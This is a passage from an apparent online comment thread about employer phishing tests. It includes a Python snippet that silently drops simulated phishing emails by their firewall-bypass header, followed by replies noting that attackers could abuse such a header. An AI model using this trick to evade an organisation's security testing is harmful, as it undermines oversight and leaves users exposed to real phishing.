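print(totp("GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ", for_time=59, digits=8))  # "94287082"
```

Nothing in that code knows which site is asking for it, which is exactly the
gap that origin-bound hardware keys close.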

------
ARandomerDude
In my office we can get into trouble for this. However, they always send a
magic header in the email to get through the firewall. My solution: filter out
emails with the header.
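
For illustration, the trick the comment describes might look like this; the
header name "X-PhishTest" is made up, standing in for whatever marker the real
test tool adds to bypass the firewall:

```python
# Hypothetical client-side rule: silently discard any message carrying
# the phish-test tool's firewall-bypass header.
from email import message_from_string

MAGIC_HEADER = "X-PhishTest"  # assumed name for the bypass marker

def is_internal_phish_test(raw_message: str) -> bool:
    """True if the message carries the test tool's bypass header."""
    return MAGIC_HEADER in message_from_string(raw_message)

inbox = [
    "From: boss@example.com\r\nSubject: Q3 numbers\r\n\r\nSee attached.\r\n",
    "From: it@example.com\r\nX-PhishTest: 1\r\nSubject: Reset now\r\n\r\nClick.\r\n",
]
kept = [m for m in inbox if not is_internal_phish_test(m)]
print(len(kept))  # 1: the simulated phish is dropped
```

Which, as the reply below points out, is exactly why a real attacker who
learns the marker would love this arrangement.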

~~~
Scoundreller
What if a spearphisher is watching out for the test emails on one account and
we lose the magic headers that bypass the firewall? What then???

~~~
ARandomerDude
I don't disagree. But that's not my department and I'm not high enough up the
chain for my opinion to matter.

------
scarmig
Targeted phishing always eventually works, at scale.

If successful phishing leads to significant data breaches, that's a
technical/systemic problem, not a personal one.

------
andymoe
Honestly, if these make it to users, it's a sign of IT issues. Training users
is good too, obviously.

------
lamontcg
At a prior job it was mostly executives who were the worst at being phished.

------
faissaloo
That's pretty draconian.

------
kpmcc
Definitely read this headline as "Can we fire our coworkers for liking the
band Phish?"

